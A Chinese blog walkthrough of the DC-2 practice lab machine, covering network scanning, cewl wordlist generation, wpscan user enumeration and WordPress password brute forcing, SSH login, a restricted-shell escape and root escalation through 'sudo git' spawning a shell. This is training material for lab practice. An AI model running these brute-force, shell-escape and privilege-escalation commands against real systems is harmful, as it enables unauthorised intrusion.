DC系列靶机2通关教程

原创 已于 2023-09-17 19:26:44 修改 · 139 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全 #web安全 #靶机 #DC

于 2023-08-16 22:35:11 首次发布

DC-2

信息收集

arp-scan -l #扫描局域网中所有设备

image-20230811211454335

nmap -p- -A 192.168.16.161 #扫描靶机端口

image-20230811212107597

发现有80端口,直接访问192.168.16.161,可是发现无法访问被重定向到了http://dc-2/

image-20230811212425319

可以修改hosts文件,hosts文件是负责IP地址与域名快速解析的文件,hosts文件位置在:/etc/hosts

vim /etc/hosts

image-20230811213349320

/etc/init.d/networking restart #配置好后重启服务

修改过hosts后就可以登录DC-2的网站了

image-20230811213845467

密码爆破

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.More passwords is always better, but sometimes you just can’t win them all.Log in as one to see the next flag.If you can’t find it, log in as another.

你通常使用的单词表可能不起作用,所以你可能只需要 "cewl"。密码越多越好,但有时你就是无法赢得所有密码。以一个人的身份登录,查看下一面旗帜。如果找不到,就以另一个身份登录。

第一步

flag提示需要使用cewl工具爬取密码,再进行用户账户密码爆破

cewl 是一个命令行工具,用于从网页中提取信息。

https://www.freebuf.com/articles/network/190128.html此网址为cewl的使用方法

cewl http://dc-2/ -w password.txt #将爬出的密码存放至password.txt
cat password.txt #查看爬出的密码

image-20230812093221532

第二步

使用Wappalyzer扫描查看网站使用的技术,发现使用的是WordPress框架

image-20230812100356633

使用wpscan暴力枚举用户名

https://www.jianshu.com/p/a0143cc79215此网站记载wpscan的使用方法

wpscan --url http://dc-2/ -e u #参数信息:--url | -u 配置扫描URL,--enumerate | -e 枚举信息;选项:u 枚举用户名,默认从1-10

说明:

--url #要扫描的目标url,允许的协议http、https,默认使用http协议。

-e #选项启用详细扫描模式,将执行更深入的安全测试。

#在详细扫描模式下,wpscan 将进行以下操作:

#    1.识别已安装的WordPress版本。

#    2.检测已知的WordPress漏洞和安全问题。

#    3.扫描目标站点的插件和主题,查找可能存在的漏洞或安全弱点。

#    4.查找可公开访问的文件和目录。

#    5.爬取网站,并尝试发现隐藏页面或目录。

#    6.分析目标网站的用户信息,包括用户名、用户ID等。

#    7.进行弱密码猜测,尝试使用常见的用户名和密码组合进行登录。

image-20230812094835120

image-20230812094915950

得到三名用户:admin,tom,Jerry

第三步

创建用户字典,使用wpscan爆破用户密码

vim user.txt

admin
tom
jerry

image-20230812100727636

密码爆破

wpscan --url http://dc-2/ -U user.txt -P password.txt

image-20230812101628128

image-20230812102130533

Username: jerry, Password: adipiscing
Username: tom, Password: parturient

第四步

扫描网页

nikto -h http://dc-2/

nikto 是一个开源的网络安全扫描工具,用于检测和评估目标网站上存在的漏洞和安全风险。它可以对Web服务器进行全面的漏洞扫描,包括敏感文件、配置错误、弱密码等。

在这个命令中,-hnikto 命令的一个选项,用于指定目标主机。在这里,目标主机是 http://dc-2/http://dc-2/ 是一个URL,指向名为 dc-2 的主机或网站。

image-20230812105158639

查到登录路径:wp-login.php

image-20230812105323377

第五步

使用jerry身份登录wordpress,获得flag2

image-20230812105830339

image-20230812110020385

也使用tom的账户登录,什么也没有发现,查看其他的端口

再次使用nmap扫描所有端口,发现打开了ssh服务端口号为7744

image-20230812110354667

登录ssh

ssh jerry@192.168.16.161 -p 7744
ssh -p 7744 tom@192.168.16.161

image-20230812110923583

image-20230812111150478

发现有rbash限制 https://blog.csdn.net/weixin_43705814/article/details/111879362rbash解释和绕过

绕过rbash

BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出

image-20230812113425954

发现flag3,查看内容

image-20230812113527701

flag3内容提到了jerry,查看是否有Jerry用户

image-20230812113732848

切换jerry用户

su jerry

image-20230812113858679

提权

切换目录至root查看内容,发现flag4,查看内容

image-20230812114038453

这里提示使用git进行提权

查找root设置了suid权限的文件,并将错误写入 /dev/null

find / -user root -perm /4000 2>/dev/null

image-20230812114949763

看到有sudo权限,使用sudo -l显示当前用户能过使用的sudo命令有哪些

image-20230812115144349

发现可利用sudo执行git命令,查看提权网站https://gtfobins.github.io/

image-20230812115409170

sudo git -p help config
!/bin/sh

得到root权限,并发现最终flag,查看内容

image-20230812115953285

image-20230812120224024

也能使用提权工具gtfo-master进行提权,在新窗口输入

cd gtfo-master
python3 gtfo.py git

回到远程登录的窗口,输入提权命令

git branch --help config		# 提权命令1
sudo git help config			# 提权命令2
 #提权命令任选其一就可以了
!/bin/sh

image-20230812140452122

gtfo-master进行提权,在新窗口输入

cd gtfo-master
python3 gtfo.py git

回到远程登录的窗口,输入提权命令

git branch --help config		# 提权命令1
sudo git help config			# 提权命令2
 #提权命令任选其一就可以了
!/bin/sh

[外链图片转存中…(img-g6a2l3xF-1692196414371)]

image-20230812140538156

DC系列靶机1通关教程
weixin_58954236的博客
08-04 326
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。Meterpreter的功能强大,灵活性高,提供了很多有用的命令和功能,包括:进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。
DC系列靶机3通关教程
weixin_58954236的博客
09-18 696
save保存,保存就上传成功了,再根据joomla的特性,模块会单独放在一个文件夹里/templates/,而beez3模块就在/templates/beez3/里面,刚才创建的webshell路径为。利用John工具,对该密码进行爆破拆解,先在桌面创建一个文件,将上面的hash密码复制进去并保存,接着使用John指向该文件。文本中写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的连接。然后访问上传的文件webshell的地址,执行反弹shell的PHP代码。
DC系列靶机5通关教程
weixin_58954236的博客
09-17 319
信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch漏洞利用bp抓包分析数据包,测试到有文件包含漏洞木马上传,查看日志反弹shellpython交互shell。
DC系列靶机1通关教程_dc1 靶机
2401_84520377的博客
05-16 441
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
DC系列靶机1通关教程_dc1 靶机(1)
2401_84520332的博客
05-16 349
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
2024年网安最新DC系列靶机1通关教程_dc1 靶机
2401_84298087的博客
05-01 560
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
DC-6靶机通关
qq_63831588的博客
07-29 2809
做完感觉这个靶机还是很有意思的,并且它其实不难,但是这个思路真的很有意思。首先他的关键点在于让我们通过wp插件的漏洞去拿到webshell其次就是普通用户间的博弈,以往我们都是通过账号密码看来进行切换,而这次是通过sudo普通用户来切换然后最后的提权还是用的sudo,确实也听巧妙的,这次我愿称之为将 sudo 进行到底!!!~~~~~持续更新中。
DC-5靶机通关
qq_63831588的博客
07-25 941
到这里我们只是可以查看文件而已,并不能上传文件,比如我写点代码什么之类的传上去,我们的最终目的是能够远程控制这台服务器,所以到这里我就又迷茫了,搜了一下教程以后知道了这么个东西,叫做日志文件,就是虽然我们不能够直接往里写东西,但是我们可以去请求一些东西,通过请求把我们的一些代码记录在那个日志文件中,然后我们利用文件包含漏洞引用一下这个日志文件,他就可以把里面的代码执行,这样的话不是就达到我们的目的了吗?找这个玩意儿的方式有很多,我这里用bp,当然wfuzz等等也是可以的,它的原理其实就是爆破!
DC-9靶机通关
qq_63831588的博客
11-01 993
端口扫描,sql注入,文件包含,爆破,端口敲门,sudo提权
2025年游戏盾SDK动态加密技术全景解析:从防御破解到重塑游戏安全基石
2403_86962125的博客
08-22 659
2025年的游戏安全战争,本质是“加密强度”与“破解成本”的博弈。游戏盾SDK通过动态密钥协商×协议混淆×多层加密×AI自适应的四维体系,将破解成本提升至黑产无法承受的高度。当攻击者的ROI(投资回报率)趋于零时,你的游戏才真正安全。立即行动现有项目评估:使用抓包工具测试当前游戏协议是否明文传输逐步升级:从关键接口(登录/支付)开始部署动态加密长期规划:制定向后量子密码迁移的路线图。
解决远程桌面连接“为安全考虑,已锁定该用户帐户,原因是登录尝试或密码更改尝试过多”问题
goolean的专栏
08-21 300
1、登陆阿里云后台通过ECS的VNC连接,不要直接输入用户名密码,那种还是不让登陆,直接开始vnc连接,出现window登陆画面后,再输入密码。3.依次选择:计算机配置→Windows设置→安全设置→帐户策略→帐户锁定策略。登陆后,运行 gpedit.msc 打开组策略。5.改为“0”,会提示这个,忽略,确定即可。鼠标点不动确定,直接按回车键就可以了。4.双击“帐户锁定阈值”
电子厂静电释放检测误报率↓81%!陌讯多模态融合算法在安全生产监控的落地实践
xiaobaibai153的博客
08-24 417
【原创声明】本文为作者原创技术解析,引用数据与技术方案均来自 “陌讯技术白皮书(静电释放检测专项版)”,未经许可禁止转载。
01 网络信息内容安全--绪论
爱学习爱运动的专栏
08-21 603
【【图解贝叶斯公式】1小时吃透大学四年没整明白的贝叶斯分析推导及垃圾邮件过滤实例(朴素贝叶斯/机器学习算法/MCMC算法/人工智能高数)】https://www.bilibili.com/video/BV1v3VUzjEqN?–人工智能/机器学习/深度学习】https://www.bilibili.com/video/BV1TAtwzTE1S?–人工智能/机器学习/深度学习】https://www.bilibili.com/video/BV1TAtwzTE1S?【都2022年了,居然还不懂社会网络分析?
【信息安全】英飞凌TC3xx安全调试口功能实现(调试口保护)
最新发布
十六宿舍的博客
08-24 684
本文介绍了英飞凌TC3xx系列芯片的安全调试功能,提供了三种配置方法来完成调试口保护功能:Memtool工具操作、程序结构体定义和Flash命令编写。同时,针对产品开发不同阶段的需求,给出了调试接口加密与解密的详细步骤及注意事项。这些安全功能既满足了开发调试需求,又能有效防止攻击者通过调试接口窃取或篡改关键数据,为嵌入式系统提供了重要的安全保障
档案宝系统功能:权限分级,保障档案安全
danganbao的博客
08-21 1252
在工作中,你是否遇到过这样的情况:明明只是想让同事查看一份普通的项目档案,结果对方却不小心删了重要数据;或者公司的核心合同档案,随便一个新来的实习生都能轻松下载?这些问题的根源,往往在于档案管理系统缺乏合理的权限控制。而档案宝的权限分级功能,就是为了解决这些痛点而生,今天就来好好聊聊它是如何保障档案安全的。
数字防线:现代企业网络安全运维实战指南
huluang的专栏
08-24 32
《GB/T 45940—2025》网络安全运维指南为企业提供了系统性安全防护框架。标准定义了网络安全运维的三大模式(自建、联合、托管)和七大核心环节(管理、识别、防护、监测、处置、协同、评估),强调安全运营中心(SOC)建设要点和持续改进机制。该指南适用于各类组织,通过标准化流程和智能化手段构建动态防御体系,帮助企业在数字化时代有效管控风险、保障业务连续性。无论采用何种运维模式,关键在于系统规划、规范实施和持续优化。
电能质量监测装置 分布式光伏安全并网“准入证”
Amy121121的博客
08-21 288
APView500系列电能质量在线监测装置符合国家标准,可实时监测所有电能质量参数,并记录波形和事件,是光伏并网点的理想选择。该平台提供专业的电能质量分析报告,以丰富的图表(如谐波频谱图、趋势曲线)进行可视化展示,帮助用户一目了然地掌握全网电能质量状态,并生成符合电网要求的验收报告。各国电网公司都对分布式电源(如光伏)的并网制定了严格的技术标准(如中国的GB/T 19964、GB/T 29319等),明确规定了并网点的电能质量指标限值,包括电压偏差、频率偏差、谐波、电压波动与闪变等。
如何配置安全的SFTP服务器?
2409_89014517的博客
08-21 840
如何配置安全的SFTP服务器?
自动驾驶汽车机器学习安全实用解决方案
NewCarRen的博客
08-20 1160
摘要:本文探讨了自动驾驶汽车中机器学习算法的安全挑战及其应对策略。文章首先指出当前汽车安全标准(如ISO 26262和ISO/PAS 21448)在应对机器学习特有的可解释性、验证和性能局限等问题上存在不足。通过系统分析机器学习与功能安全标准的五大差距(设计规范、透明度、验证、鲁棒性和监控),作者提出两类实用安全技术:1)基于不确定性估计、错误检测和分布外检测的运行时监控功能;2)通过域适应、多任务学习和数据增强提升模型鲁棒性。研究还讨论了对抗性攻击风险和用户体验设计的重要性,强调需要跨学科合作来确保自动驾
容器安全实践(二):实践篇 - 从 `Dockerfile` 到 Pod 的权限深耕
daihaoxin的专栏
08-23 774
本文深入探讨容器安全实践,重点分析runAsNonRoot的本质意义、镜像构建与运行时权限的契约关系。文章指出runAsNonRoot不仅是简单的安全开关,更是彻底放弃root权限的安全理念。在镜像构建环节,强调"构建时用root,运行时用非root"的黄金法则,详细说明Dockerfile中创建非root用户、处理文件权限等关键步骤。最后,提出Kubernetes部署时的安全配置组合拳,强调容器安全是从镜像构建到Pod运行的全生命周期防护过程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安咸鱼1517

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值